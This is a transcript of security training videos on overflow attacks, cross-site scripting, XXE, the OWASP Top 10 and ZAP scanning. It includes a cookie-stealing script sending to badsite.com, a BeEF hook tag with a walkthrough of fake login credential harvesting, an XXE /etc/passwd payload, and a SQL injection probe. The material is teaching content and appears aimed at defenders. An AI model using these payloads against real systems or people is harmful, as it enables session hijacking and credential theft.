And it continues to be an issue. Generally speaking, when we say overflow attack, what we're talking about is
some kind of malicious input being fed into an app and the app accepts it and processes it. Now, that's pretty
generic. But we'll go through a couple of more specific examples. Now the result of the app processing that
malicious input, whatever it is, is that there's some kind of unanticipated app behavior. Whether the app
crashes, or discloses sensitive information, or allows the attacker to execute commands remotely with elevated
privileges. This is the same type of behavior you might expect with an injection attack. The difference is really
the nature of the vulnerability that gets exploited in the first place.
Common overflow attack types. Well, we start with an integer overflow. So an integer is a numeric value and
when we perform mathematical calculations as a part of application logic or application code. If the result of a
mathematical calculation exceeds the size of a variable that's maybe designed to accommodate a smaller value,
we have a problem. We could have an integer overflow issue. Now what that could mean is, well a number of
various behaviors. Because what can happen with integer values is that once we get to the upper limit, it resets
back to the lower limit. How the code processes that value determines exactly what the result is.
It could result in simply crashing the app. Then we've got standard buffer overflow attacks related to stacks
and to heaps.
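Before getting into buffers, here is a minimal C sketch of the integer wraparound just described. The 8-bit counter and the made-up sizes are purely for illustration.

#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

int main(void)
{
    /* An 8-bit unsigned counter can only hold 0 through 255. */
    uint8_t counter = 250;
    counter += 10;                        /* wraps around: 250 + 10 becomes 4 */
    printf("counter is now %u\n", (unsigned)counter);

    /* Wraparound can also defeat a size calculation. If both values are
       attacker-influenced, the multiplication below overflows 32 bits and
       produces 0, so far too little memory gets allocated. */
    uint32_t items = 0x10000000;          /* 268,435,456 */
    uint32_t item_size = 16;
    uint32_t total = items * item_size;   /* overflows to 0 */
    printf("requested %u bytes\n", (unsigned)total);
    char *buf = malloc(total);            /* "succeeds" with far too little space */
    free(buf);
    return 0;
}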
Generally speaking, a buffer is an allocated chunk of memory. And attacks can either write beyond that
allocated memory space to cause problems or read from it to disclose sensitive information. And you might
recall that's what the Heartbleed bug was about back in 2014, for web apps that, ironically, used OpenSSL to secure their connections. What happened is that a heartbeat request could be made to the web app through OpenSSL that submits a payload that's actually only, let's say, 10 characters long, but claims that it's 1,000 characters long. The server wouldn't check that claim. It would echo back the 10 characters that were submitted plus hundreds more characters of whatever happened to be in adjacent server memory.
And you do that enough times within a short period of time, you get a good sense of what's happening in
memory on that server. That was the heartbleed bug. But that is not a standard buffer overflow where we're
overwriting something. In this case, we are reading beyond a specific allocated buffer. Now when it comes to
stacks and heaps, we should be aware of what these are. First of all, let's start with a stack. When we talk about
a stack, we're talking about an area of memory that, in this case, holds things like an app's local variables, including variables that hold user input. Memory for variables on the stack is allocated and deallocated automatically, so it's made available and then removed when it's no longer needed.
However, when we talk about a heap, we're talking about memory space used by an application where the programmer has to manually allocate and deallocate the memory. Either way, how the code is written and how it processes data supplied to buffers, or data stored in buffers, will determine what happens. So
when it comes to buffer overwriting, when we write beyond a certain allocated memory space, the app doesn't
expect other memory addresses to be written into. And that could cause some kind of a memory segmentation
fault and cause an app to crash, for example.
[Video description begins] Web Application Buffer Overflow Attack. A few lines of code are displayed, code
starts: void readstring() { char stringvar[3]; gets(stringvar); printf("%s", stringvar); return; }. Code
ends. [Video description ends]
Let's look at this example where we've got an app on a server and this is code written in the C programming
language. We've got a function here that doesn't return anything, so void, and it's called readstring. And the
first thing we're doing is establishing a variable called stringvar, three characters, because there is no string
data type in the C programming language. The best you can do is work with character arrays. Now the next
thing is the problem, we're using the gets or the get-S, get string function to read user input and store it in a
variable called stringvar. The problem is that the gets function just keeps on reading. It doesn't matter that
we've said that stringvar is three characters long, the function itself just keeps reading till it reads a newline
character. And so that's a problem. Because you might write your code assuming that only three characters
were ever input when, in fact, more might have been supplied.
Here, the printf statement is simply being used to print that item as a string, and then the function return statement is executed. So instead of using gets, what really should have been done here is the developer should have selected the fgets function, because fgets can set a maximum limit on what is read, unlike gets. Now, if this is the
code that's in place, then an attacker could supply more than three characters. And beyond the three characters
that are expected, that might be instructions that are to be executed server-side or could be just random data
that could cause the application to crash. Again, it really depends on the nature of the code and what it's doing
and where things are written to in memory.
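Here is a minimal sketch of how that same readstring function could be rewritten with fgets so that reads are bounded. The 64-byte buffer size is just an assumption for illustration.

#include <stdio.h>
#include <string.h>

void readstring(void)
{
    char stringvar[64];                    /* assumed, more realistic buffer size */

    /* fgets stops after sizeof(stringvar) - 1 characters or at a newline,
       so input can never run past the end of the buffer the way gets allows. */
    if (fgets(stringvar, sizeof(stringvar), stdin) == NULL) {
        return;                            /* no input or read error */
    }

    /* Strip the trailing newline, if one was read. */
    stringvar[strcspn(stringvar, "\n")] = '\0';

    printf("%s\n", stringvar);
}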
So, what can we do about this? Well, the first order of business is to make sure that programmers adhere to
secure coding guidelines. One item of which is to make sure we have bounds checking: to make sure that if we're asking for three characters, we only accept three characters. Or, if we're accepting input from a user and the user claims to be giving us 10 characters that we're going to return to them, we'd better make sure we check that claim and return only 10 characters, and not 1,000 characters, for example.
That references back to the heartbleed bug, the sensitive disclosure of information that shouldn't have been
disclosed.
As always, it's important to apply patches to the underlying operating system hosting an app, to software libraries and components used by the app, and to developer tools used to work with the app. Also consider the use of
trusted code libraries. These days programmers don't write all of the code from scratch, they call upon existing
libraries. And some existing libraries are designed for secure coding. One example of that is the OWASP
ESAPI, the E-S-A-P-I, the enterprise security API. The other thing to consider is input validation in many
forms, including escaping special characters. As the term implies, a special character, such as a question mark
or a double quote or an asterisk or anything like that, has a special meaning in a certain environment. And so we can take away those special meanings by escaping those characters, because their special meanings might be how an attacker injects malicious input or issues remote commands. In some languages, for example, the escape character is a backslash. So where a
question mark might normally have special meaning, if you put a backslash in front of it, you are taking away
the special meaning and literally treating it, in our example, as a question mark.
Upon completion of this video, you will be able to list different types of cross-site scripting attacks.
Objectives
[Video description begins] Cross-Site Scripting (XSS) Attacks. [Video description ends]
Cross-site scripting is a type of injection attack, because the malicious user is injecting code, often JavaScript, which ends up executing in client web browsers. So what happens, to begin with, is that the
attacker injects malicious code through many different means. Through the URL, maybe through a web form
that isn't properly validated for user input or tricking a user to click a malicious ad that redirects them to some
other site. One way or another, the malicious code is made available. And somehow, we trick users into
viewing a page with that code on it, or clicking a link to get to that page. The malicious code then becomes
part of a web page that runs on the user's machines in their web browser. So the code ends up executing client
side for the most part. So when the victim loads the page, the code executes locally.
Now there are a number of different reasons why cross-site scripting attacks are implemented by attackers. One is website defacement. Another is to hijack user session information like cookies, which
could provide a wealth of information, especially if the user's currently signed into a banking app, for example,
on the web. Also, user redirection to alternate sites that might be under the control of the attacker to receive
sensitive information, like banking account details. There are three common types of cross-site scripting
attacks, the first being a DOM XSS attack. This stands for Document Object Model.
Essentially what can happen, is that attackers can put JavaScript code into a URL that then gets brought into an
HTML page, and then run by the client web browser. So a DOM XSS attack, a Document Object Model cross
site scripting attack, runs entirely on the client side. It's completely a client web browser type of attack. Now,
the user still has to somehow be tricked into loading that page. And that might even stem from the attacker
sending a phishing e-mail that looks legitimate, something to entice the user to click.
Next, we have a reflected cross-site scripting attack. Now, this is also called non-persistent because it's not
being stored on the server side. What happens is that an attacker discovers a vulnerable web app that has the ability to echo something back to a user, such as the results of a search, or maybe an error page when something sent to that web app results in an error. So in other words, a malicious
script is reflected off of a vulnerable web app back to the victim's browser. So that would be a way that a user
might click a link in a phishing e-mail. And maybe that would run some kind of a search on a vulnerable web
app. And then you might get search results. But at the same time, what's reflecting back is some malicious
JavaScript code that was injected by the malicious user.
Next, we've got a stored cross-site scripting attack. This is called persistent because it's being stored on a web
server. So with the reflected XSS attack, the malicious JavaScript code is being injected as part of a URL. It's
not really being stored anywhere. However, with a stored persistent XSS attack, one way or another, an
attacker finds a way to inject JavaScript code, malicious code, let's say into a blog form. Maybe there's a form
where you can enter the body of your comments. And it doesn't have proper input validation checking. And so
the attacker can actually store, besides regular comments, actual JavaScript code. And so when anyone views
that blog entry on that web app, then they're also executing that JavaScript code. So you have the potential to
reach a larger victim audience so to speak from the attacker's perspective with a persistent cross-site scripting
attack.
And cookies are used to store website session information or user preferences, that type of data, it could be
anything really. So what would happen then is the victim would click the link. And in this particular example,
they would see the web page search result. So maybe the malicious user tricks the user into saying, hey, click
this link and there's some videos of you that were taken through Facebook video or something. The user will
click it and any of their current session cookies would be sent along to badsite.com, and the user wouldn't
know it. They wouldn't know their cookies were sent there because it's just JavaScript running in the background. There doesn't have to be any visible user interface component, so there's nothing to tip them off that it's actually happening.
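To make that concrete, an injected payload of this kind, whether stored in a blog comment or reflected back in a search result, often looks something like the following illustrative snippet, where badsite.com stands in for an attacker-controlled server as in the example above.

<script>
// Illustrative only: silently sends the victim's cookies for the current site
// to an attacker-controlled server by requesting a fake image.
new Image().src = "http://badsite.com/steal?c=" + encodeURIComponent(document.cookie);
</script>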
In this video, you will learn how to use the BeEF tool to exploit a web browser.
Objectives
[Video description begins] Topic title: Web Browser Compromise. The presenter is Dan Lachance. [Video
description ends]
We've all heard about the media reports about compromised hosts and credit card information and so on.
Oftentimes, the way that this actually occurs is simply by tricking unsuspecting victims into clicking on
something in an e-mail message or viewing a web page that has some kind of malicious script in it. In this
example, we're going to use Kali Linux to essentially take over a web browser, and we're going to do it
essentially by tricking that person into running a script. Now, in Kali Linux there's a tool called BeEF, B-E-E-F, and
it really stands for Browser Exploitation Framework. So to get started here, in Kali Linux, we're going to have
to load up the BeEF daemon, or server-side service, for this to work correctly.
[Video description begins] The following window is open: dlachance@kali:/. The following prompt is
displayed: dlachance@kali:/$. [Video description ends]
Then I'm going to use the sudo command to run the nano text editor that's built into Kali Linux, and I'm going
to edit a file in /etc/beef-xss, and the file's called config.yaml.
[Video description begins] He executes the following command: sudo nano /etc/beef-xss/config.yaml. The
/etc/beef-xss/config.yaml file opens. It includes the credentials to authenticate in BeEF. [Video description
ends]
One of the things that we can do here is specify the username and password that as a malicious user we would
use to authenticate to the BeEF web GUI tool, so the web interface. So once I've changed that, I can press
Ctrl+X for exit, and if it prompts me to save to the file, I would choose the letter Y and press Enter for yes.
[Video description begins] He exits the /etc/beef-xss/config.yaml file. [Video description ends]
Now that that's done, I'm going to use the sudo command again, because I want to run this as a privileged user.
And I'm going to run ./beef to start up the BeEF daemon. We can see it's actually loading right now, we just
have to wait a few seconds.
[Video description begins] He executes the following command: sudo ./beef. The output displays that the BeEF
server has started. [Video description ends]
And we can see here the IP address that it's running on, in this case 192.168.4.52.
[Video description begins] In the output, he points to the network interface: 192.168.4.52. [Video description
ends]
Notice we also have a UI URL. That's what we would connect to in order to manage any hooked or compromised web browsers. There's also a Hook URL. That's a little JavaScript file that we can embed within, for example, an HTML document using script tags.
[Video description begins] In the output, he points to the UI URL: http://192.168.4.52:3000/ui/panel. He then
points to the Hook URL: http://192.168.4.52:3000/hook.js. [Video description ends]
And this is what would actually execute in victim web browser computers that would compromise their system
and connect it to the BeEF server. Okay, let's take a look at how this actually works.
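As an illustration, hooking a page is as simple as embedding that hook script with a single script tag, something like the snippet below, which uses the IP address and port shown for this particular demo server.

<!-- Illustrative only: any browser that loads a page containing this tag
     becomes a hooked browser in the BeEF control panel. -->
<script src="http://192.168.4.52:3000/hook.js"></script>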
[Video description begins] He switches to the BeEF Authentication web page in a browser. [Video description
ends]
So in a web browser window, I've popped in that URL for the IP address of the BeEF server. It listens on port 3000 by default, then /ui, and in this case /authentication. And I'm going to put in my BeEF credentials
according to whatever I've placed in the BeEF config yaml file. And after I've done that, it will authenticate me
into the UI.
[Video description begins] The BeEF Control Panel web page opens. The screen is divided into two parts, the
Hooked Browsers pane and the content pane. The Hooked Browsers pane includes two nodes: Online
Browsers and Offline Browsers. A page called "Getting Started" is open in the content pane. [Video
description ends]
Now here, I've got online and offline browsers. So offline browsers are ones that were previously hijacked or
connected to this interface.
[Video description begins] He expands the Offline Browsers node, and under it there is a 192.168.4.52
subnode. [Video description ends]
Now, on the Getting Started page, we've got a couple of demo pages here that we can use to hook a web
browser. So for example, I'm going to right-click on the first link for the demo page and copy that link. And
I've fired up a different web browser, in this case Google Chrome, and I've pasted in that link. And it says You
should be hooked into BeEF, Have fun while your browser is working against you. So we're simply testing
this. Let's flip back to the BeEF management GUI.
[Video description begins] He switches back to the BeEF Control Panel web page. [Video description ends]
Now, sure enough, under online browsers up here on the left, we can see the IP address of the browser, and it
appears to be Google Chrome. I can just hover over it and get some details. Looks like it's running Windows
10.
[Video description begins] The Online Browsers node expands, and it includes the 192.168.4.52 subnode,
which further includes the 192.168.4.24 subnode. [Video description ends]
If I click on it, I can also see a number of other details that are available. I can see the browser name.
[Video description begins] He clicks the 192.168.4.24 subnode and a page called "Current Browser" opens in
the content pane. It includes the following tabs: Details, Logs, Commands, and Proxy. The "Details" tab is
selected and it includes a table with two columns and several rows. The column headers are "Key" and
"Value". [Video description ends]
We can also see the platform. We can also see browser cookies. So here's a cookie related to hooking into the
BeEF GUI, this interface running on our server. And we could see a number of other details here, like the
window title for the web browser that we've compromised, and the URI and so on and so forth. So having done
that, we have a number of interesting things that we can do. For example, we can go to Logs, and we can see
what's been happening.
[Video description begins] He selects the "Logs" tab and it includes a table with 5 columns and several rows.
The column headers include "Type", "Event" and "Date". [Video description ends]
So for example, let's say I go back to this page, which is still active, and I'll type something in. I'm going to
type in happy birthday. Even though I'm not submitting it anywhere, I'm typing it in.
[Video description begins] He switches to the BeEF Basic Demo web page. It includes a field labeled "Have a
go at the event logger. Insert your secret here:". [Video description ends]
So back here in the BeEF Control Panel under Logs, I'll just click the Refresh button at the bottom. And we
can see here, I've typed in happy birthday.
[Video description begins] He switches back to the BeEF Control Panel web page. [Video description ends]
We can actually see that that is what has been typed in to that browser. That in and of itself is extremely
alarming.
[Video description begins] He points to three row entries in the table on the Logs page. [Video description
ends]
There are plenty of things that are possible here, so let me just go to the Commands tab here for a moment.
And let's say we just go to, let's see, miscellaneous category, maybe Raw JavaScript.
[Video description begins] He selects the "Commands" tab. The page is divided into three sections: Module
Tree pane, Module Results History pane, and the content pane. The Module Tree pane includes the "Misc"
node. [Video description ends]
Here, we can send some JavaScript to the controlled browser. So here, it's just going to say BeEF Raw
JavaScript, and It worked.
[Video description begins] He expands the Misc node, which includes the Raw JavaScript subnode. He selects
the Raw JavaScript subnode and its corresponding page opens in the content pane. It includes a text box
labeled "Javascript code" and a button labeled "Execute". The "Javascript code" text box contains the
following text: alert('BeEF Raw Javascript'); return 'It worked!';. The Module Results History pane includes a
table with three columns and two rows. The column headers are id, date, and label. [Video description ends]
[Video description begins] He clicks the "Execute" button. A new row entry gets added to the table in the
Module Results History pane. [Video description ends]
And it says that the command was sent. And let's just go check it out in our browser. If I switch over to Google
Chrome, indeed, here it is.
[Video description begins] He clicks the third row entry in the table in the Module Results History pane and its
corresponding page opens in the content pane. He switches to the BeEF Basic Demo web page. A pop-up box
with the following text appears: 192.168.4.52.3000 says BeEF Raw Javascript. It includes a button labeled
"OK". [Video description ends]
Here's our raw JavaScript that was just executed on this hooked browser. So you can start to send messages to
unsuspecting victims so that you could trick them into doing something they otherwise wouldn't do. Now, we
wouldn't do this under normal circumstances. We would only do this in a test environment for the sole purpose
of learning how to mitigate or stop this type of activity.
[Video description begins] He clicks the "OK" button. [Video description ends]
Back here in the BeEF Control Panel, there's just so many things that could be done. If I expand Browser, let's
say, here, we could see Hooked Domain, and we could choose Get Cookie. We could execute that, and we
could start to see the results.
[Video description begins] He switches back to the BeEf Control Panel web page. He clicks the "Browser"
node in the Module Tree pane, which includes the "Hooked Domain" subnode, which further includes the "Get
Cookie" subnode. He clicks the "Get Cookie" subnode and its corresponding table opens in the "Module
Results History" pane and its corresponding page opens in the content pane. The table in the "Module Results
History" pane contains three columns and two rows. [Video description ends]
And it might take a moment before you start seeing results that are sent back here. You start to see cookie.
[Video description begins] He selects the first row in the table in the Module Results History pane and its
corresponding page opens in the content pane. [Video description ends]
Those cookies can contain sensitive token information for current web browser sessions on the user device. So
that is a concern. There are other things that we can do. So for example, let's see, what else can we do here?
We could close up Browser, maybe we'll go to Network. So many options.
[Video description begins] He selects the Network node in the Module Tree pane, which includes the ADC
subnode. [Video description ends]
Now, if we've got a green symbol, it means that BeEF has detected that that module should work against this browser, although you just have to be patient. But just because something is red doesn't mean it won't work; it's just that it hasn't been verified from this interface that it will. Then again, it's not guaranteed to work either. So we've got a number of
good things that we can do here. For example, if I go down under Social Engineering, this is a good one, Fake
LastPass.
[Video description begins] He selects the Social Engineering node in the Module Tree pane, which includes
the Fake LastPass subnode. [Video description ends]
So LastPass, of course, is a password manager tool that is often used online and that encrypts passwords. So we can actually trick people into essentially signing in to what looks like LastPass. So here's how this would work. We could choose
Fake LastPass, and then all we have to do is click Execute over here on the right.
[Video description begins] The corresponding table opens in the Module Results History pane and the
corresponding page opens in the content pane. The content pane includes a button labeled "Execute". He
clicks the "Execute" button and a new row entry gets added to the table in the "Module Results History"
pane. [Video description ends]
[Video description begins] He switches to the BeEF Basic Demo web page. A pop-up box labeled "Sign In"
opens. [Video description ends]
And if they're a LastPass user, they might think my session must have timed out, I'll just log back in again. So
I'm just going to put in some credentials here, and the user would click Login and hopefully they think
everything is okay. Back here, in BeEF, if I take a look at the result of sending that command to the hijacked
web browser, we can start to see that it looks like the username. Well, let's just scroll down to the bottom,
make our life easy. The username specified then for LastPass was user and the password was password. Scary
stuff.
[Video description begins] He switches back to the BeEF Control Panel web page. The second row entry is
selected in the table that is in the "Module Results History" pane. Its corresponding page is open in the
content pane. It includes several entries. [Video description ends]
We can even do other things such as maybe making it look like there's a Facebook notification timeout or
something like that. All of these things are possible here. For example, I'm still under Social Engineering. If I
choose Pretty Theft on the left, I'm not going to change any of the default items here, but notice it's going to
use a Facebook dialog box, but it could be YouTube, Yammer, it could be LinkedIn, it could be anything.
[Video description begins] He selects the "Pretty Theft" subnode under the Social Engineering node. Its
corresponding table opens in the "Module Results History" pane and its corresponding page opens in the
content pane. The content pane includes a drop-down list box labeled "Dialog Type". The "Facebook" option
is selected in the drop-down list box. The content pane also includes a button labeled "Execute". [Video
description ends]
If I leave it on Facebook and simply just click Execute, this is what the user sees. And if indeed, they are a
Facebook user, it looks like their Facebook session timed out. And again, we could specify some details here,
the user might say, I better sign back in again.
[Video description begins] He switches back to the BeEF Basic Demo web page. A pop-up box called
"Facebook Session Timed Out" appears. [Video description ends]
And they'll click Log in. Of course, this is now all available to the malicious user. So if we look at the
command output for that, we can see the username or the e-mail address and the password that was sent.
[Video description begins] He switches back to the BeEF Control Panel web page. A new row entry gets
added to the table in the "Module Results History" pane and its corresponding page is open in the content
pane. An entry is added to the page. [Video description ends]
So this can be a little bit scary. Now, interestingly, if I go all the way back up, let's see, to Network, we even
have the option here of detecting social networks. There it is. And so, again, you have to be patient.
[Video description begins] He selects the "Detect Social Networks" subnode under the "ADC" subnode in the
Module Tree pane. Its corresponding table opens in the "Module Results History" pane and its corresponding
page opens in the content pane. The content pane includes a button labeled "Execute". The table includes
three columns and one row. A new row entry gets added to the table in the "Module Results History" pane and
its corresponding page opens in the content pane. [Video description ends]
So I'll execute that, and when I go look at the result of the command and come back after a minute, we're going
to start to see what the user is signed into. Well, let's take a look at an older command result. Gmail: the user's not authenticated to Gmail. Twitter: the user is authenticated to Twitter.
[Video description begins] He selects the first row entry in the table and its corresponding page opens in the
content pane. He points to an entry in the content pane that states information related to the user
authentication. [Video description ends]
Well, that's a timeout in Facebook, the user is authenticated to Facebook. So that might trigger the malicious
user to start trying to trick users with Facebook dialog boxes. Now, in this particular example, we started this whole thing, from the Getting Started page, by essentially pulling up a page that was infected. And so, if that page is
stored on a server, then that would be an example of a persistent or a stored XSS or cross-site scripting attack.
After completing this video, you will be able to describe how the use of insecure XML components can lead to web application compromise.
Objectives
[Video description begins] Topic title: XML Attacks. The presenter is Dan Lachance. [Video description ends]
XML stands for Extensible Markup Language. This uses tags in a text file to describe data.
[Video description begins] XML External Entities (XXE). [Video description ends]
Whereas HTML is the language used by website developers to describe formatting attributes, XML doesn't describe formatting. It describes data. So it's a common data exchange format for dissimilar
systems to exchange data over a network. Now here's an example of some XML. We're describing a data entity
called customer. And it's broken down into individual components or fields, lname for last name, fname for
first name, and then the e-mail address of a particular user. So that's what XML might be structured as. Now
the problem becomes, first of all, that we might be transmitting clear text over the network. Well, whether that's a problem depends on what kind of connection has been established. If you've got an HTTPS connection using TLS version 1.2 or higher, then it's okay to transmit this data over that connection, because it's encrypted, just as it would be through a VPN tunnel. But what becomes a problem is
when you are using extra components in your web application. Software developers these days, when they're
building a web app, probably aren't building everything from scratch. They're going to call upon existing code
libraries that already had to do a lot of the hard work, or they're going to use extra components that give their
apps extra capabilities. And one of those components would be an XML parser within the web application. So
this is a web app component that would have the ability to read XML and process it in some way, such as
maybe to filter it or transform it to another format. So it can be stored in a back-end database.
So the idea here is that we could have a malicious piece of code or a malicious user that's injecting malicious
content. Now this would be something that could be done while the XML parser is processing that input. So if
the XML parser component is older, then it might be vulnerable to this, although often, there are patches
available to prevent this from happening. But of course, not everyone patches everything when they should. So
this is called an XML external entity or XXE type of issue. So what kind of threats result from this? It could be
a denial-of-service attack. Crashing an application is considered denial of service; we are denying legitimate access to that service or to that app. Depending on how the code is using the XML parser, it could also result in remote command execution or the disclosure of sensitive data.
So for example, imagine that we've got an XML parser that's running server side on a web server and an
attacker manages to inject some code there. Maybe that's because they've gained remote access to the web
server. Or because they've got the ability to pass data into a component in the app that's going to be used by the
XML parser. And let's say that they're specifying an XML entity where they are telling it to go to the file
system and read /etc/passwd. Now, this is the user account file on a Unix or Linux system, at least on
most Unix and Linux systems. And so that could be data that gets returned to the malicious user. And we all
know that if malicious users have a valid list of usernames, that's one less thing they have to figure out as part
of their reconnaissance.
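To make that concrete, here's a minimal sketch of what such a payload might look like, reusing the customer structure from earlier. The parse endpoint on the BadStore lab host is hypothetical, and a patched or hardened parser would refuse to resolve the external entity.
# Define an external entity that points at the local password file.
cat > payload.xml <<'EOF'
<?xml version="1.0"?>
<!DOCTYPE customer [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<customer>
  <lname>Smith</lname>
  <fname>Ann</fname>
  <email>&xxe;</email>
</customer>
EOF
# Submit it to a hypothetical XML-consuming endpoint; a vulnerable parser may echo the file contents back.
curl -s -X POST -H "Content-Type: application/xml" --data-binary @payload.xml http://192.168.157.131/cgi-bin/parse.cgi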
After completing this video, you will be able to list common web application vulnerabilities.
Objectives
[Video description begins] Topic title: OWASP Top 10. The presenter is Dan Lachance. [Video description
ends]
Running or creating web applications means having a solid understanding of web application security flaws.
[Video description begins] Web Application Security Flaws. [Video description ends]
Now, this is going to be crucial to prevent any attacks from occurring against the web app or through the web
app. So we have to think about security flaws that could exist at the underlying architectural level. So at the
hardware level due to unpatched firmware, such as unpatched firmware on a wireless router that could allow
access to a network and then, in turn, gaining access to a network could lead to the compromise of a web app
on that network. Or the lack of using PKI to secure connections such as with HTTPS. The lack of
authenticating users to a network, in other words, allowing anyone to connect to a network in the first place.
There's also poor coding practices, so the lack of proper input validation is a big problem. Any input supplied
by users needs to be really treated as hostile and untrusted when it comes to writing code. And so it needs to be
checked thoroughly to make sure that malicious code isn't being injected to the app. No encryption of data in
transit is a problem, or no encryption of data at rest. And this is where the Open Web Application Security
Project, or OWASP, Top 10 kicks in. OWASP is a non-profit organization whose overall goal is to secure web
apps. And OWASP periodically publishes the top 10 web application vulnerabilities.
The first of which is injection type of attacks, where attackers feed malicious input into a web app, whether
through XML or serialized objects. Serialization and deserialization come into play when you send object
information at the programming level over a network. The object is serialized, meaning it's converted to a byte
stream or text as it's sent over the network, and then it gets put back together into an object, or deserialized, on the other end. Then
there's database queries, you might inject some commands that might retrieve data that otherwise shouldn't
have been disclosed, or maybe to destroy an underlying database table.
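As a rough illustration of that kind of database query injection, and not a command from this course, a tautology-based probe against a hypothetical search parameter could look like this:
# %27 is a URL-encoded single quote; the action and item parameter names are made up for illustration.
# If the input isn't validated or parameterized, the back-end query can end up as
# ... WHERE item = '1' OR '1'='1' ... which is always true and may return every row.
curl "http://192.168.157.131/cgi-bin/badstore.cgi?action=search&item=1%27%20OR%20%271%27=%271"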
The next or second item in the OWASP Top 10 is broken authentication, such as weak password settings
related to password length, or password expiration, or the reuse of known passwords. Or even the lack of using
multi-factor authentication to harden user sign-in security by requiring things like beyond just a username and
password, which are something you know, including something like a smart card, something you have. Or a
username and a password and a PIN sent through SMS text messaging to a smartphone. The third OWASP
Top 10 major vulnerability is sensitive data exposure, which could occur in many different ways.
It could be due to cryptographic keys that get compromised. So an attacker being able to compromise a user
station that stores, let's say, private keys. The private key, of course, is used for things like decryption or for
creating digital signatures. User accounts might be compromised. Shoulder surfing is actually an issue.
Someone in the office actually walking by and lingering to see what you're typing in. Or clear text data being
transmitted over the network and being captured. And then clear text data can also be stored on disk, so it
could be a problem with not encrypting data at rest.
[Video description begins] Clear text data is retrieved by packet sniffing as well. [Video description ends]
The fourth OWASP Top 10 security issue relates to XML external entities, otherwise called XXE.
[Video description begins] A4: XML External Entities (XXE). [Video description ends]
Here we have an example of XML data. XML is just really a way to express data stored in a text file. And so if
we're using an XML parser component in a web app that's vulnerable, it could allow malicious users to inject
content. And that could, for example, allow the malicious user to request specific information from the server
hosting the XML parser.
The fifth OWASP Top 10 security vulnerability is broken access control, where authentication leads to
authorization. Authorization, of course, means access to a resource, such as files on a file server. And, for
example, if we're not adhering to the principle of least privilege, we might allow extra access or administrative
access to file systems when that's not even required for a user to do their job. So that would be an example of
broken access control, and that would come to light through security audits.
OWASP Top 10 item A6 is security misconfiguration, such as using default items like usernames or
passwords, which is notorious with IoT devices. So default configuration settings, such as leaving the standard
web server installation path or web server root. Or not configuring TLS, Transport Layer Security version 1.2
or higher to secure connections, such as with HTTPS on a web site. Or having an open Wi-Fi network that
doesn't require any authentication at all. Or leaving unused user accounts active. Or leaving services that are
enabled by default running when they aren't even used.
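One quick, hedged way to spot-check the TLS side of that misconfiguration is an openssl probe; the host name here is just a placeholder for a system you're authorized to test.
# A completed handshake on the first command indicates the outdated TLS 1.0 protocol is still accepted.
openssl s_client -connect www.example.com:443 -tls1 < /dev/null
# Confirm that TLS 1.2 is accepted as expected.
openssl s_client -connect www.example.com:443 -tls1_2 < /dev/null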
OWASP Top 10 item A8, insecure deserialization. Modern day programming is object oriented. Object-
oriented programming or OOP, O-O-P, allows you to work with items or objects which have properties and
methods. Now, when you transmit objects between hosts, you are essentially serializing them into standard text,
and maybe storing that in a file; it allows for object portability. So with serialization, the object gets
converted to a byte stream for transmission over a network, which is just simple text. And at that point,
malicious code potentially could be injected before the object is deserialized, that is, converted back into an
object, on the other end of the connection.
[Video description begins] A9 : Using Components with Known Vulnerabilities. [Video description ends]
Item A9, using components with known vulnerabilities. Web app developers don't write everything from
scratch these days, at least not normally. They use existing libraries and components for the web app to give it
functionality. So having a lack of detailed knowledge about the component, how it's written, how it works, any
potential vulnerabilities and not putting patches on them is a problem. So if you're not updating those
components, your app could be vulnerable.
[Video description begins] A10 : Insufficient Logging and Monitoring. [Video description ends]
Finally, OWASP Top 10 item 10 is insufficient logging and monitoring. Think about the time that might be
required to detect security issues. We don't want a long time to go by before they're detected. We don't want a
delayed incident response. Now, the scary fact is if we look back in time at known logged security incidents, in
2016, the average time to detect a security event was 191 days. How much damage could a malicious user do
within that time? So continuous monitoring is important to detect suspicious activity. You can only do that if
you have the correct configuration based on what's normal in your environment. If a baseline of normalcy is
established, you can configure rules for intrusion detection to alert you when abnormal events occur. So that's
going to be an important way to detect suspicious activity.
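As one small, illustrative example of the kind of baseline monitoring being described, and assuming an Apache-style access log path, you might surface the noisiest client IPs for review like this:
# Count requests per client IP and list the top ten sources; a sudden outlier against your baseline
# is the sort of anomaly an IDS rule or an analyst would want to investigate.
awk '{print $1}' /var/log/apache2/access.log | sort | uniq -c | sort -rn | head -n 10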
[Video description begins] Topic title: Testing Web Application Security. The presenter is Dan
Lachance. [Video description ends]
Managing risks is an important part of a cybersecurity analyst job description. And part of that is determining
any vulnerabilities on a web application that need to be addressed. Now, there are plenty of sample test web
applications that are poorly coded that you can test this against to hone your skills, one of which is called
Badstore.
[Video description begins] The Badstore: 1.2.3~VulnHub web page is open. [Video description ends]
We can download this and run a virtual machine from it, and then run our web application scanner tools
against it. That's exactly what we're going to do here. Now, I've already got this running. I have the IP address
seen here.
[Video description begins] The following IP address is open in the browser: 192.168.157.131. The
BADSTORE.NET web site is open. It is divided into two parts: navigation pane and content pane. [Video
description ends]
And we can see we're at the BadStore.net sample web application. Now I could manually go through all of the
links and test all of the functionality by hand. But that's where web application vulnerability scanners kick in.
They make it quicker and easier because they're automated; tools like Burp Suite or OWASP ZAP, the Zed Attack
Proxy, which we're going to run here. Now I've got the OWASP ZAP tool installed and running here on my
Windows 10 station. But if you have other tools like Kali Linux, then OWASP ZAP is already built into that.
[Video description begins] The OWASP ZAP 2.9.0 window opens and the following pop-up box opens: Do you
want to persist the ZAP Session. It includes a button labeled "Start". [Video description ends]
So I don't want to persist any of my session settings, so I'll leave it on no, and I'll click Start.
[Video description begins] The OWASP ZAP 2.9.0 window is divided into four parts. The first part contains a
menu bar and a tool bar. The second part is a Sites pane. The third part is a content pane. The fourth part
includes several tabs including History and Alerts. The tool bar includes a drop-down list box with four
options: Safe Mode, Protected Mode, Standard Mode, and ATTACK Mode. [Video description ends]
Now in the upper-left, if I want to actually perform a penetration test, then I could choose ATTACK Mode,
which could potentially cause a problem with the web application. Now, we never want to use any of these
tools against a real system that we don't have express written permission to be performing this type of attack
against. It could land you in trouble, so use these tools properly. However, in this context, it's an application
under my control.
[Video description begins] A new tab labeled "Active Scan" opens in the fourth part of the window. [Video
description ends]
For testing purposes, I'm going to go into ATTACK Mode, and I'm going to click Automated Scan.
[Video description begins] The Quick Start page is open in the content pane. It includes a button labeled
"Automated Scan". He clicks the "Automated Scan" button and its corresponding page opens in the content
pane. It includes a text box labeled "URL to attack", a drop-down list box labeled "Use ajax spider", and a
button labeled "Attack". [Video description ends]
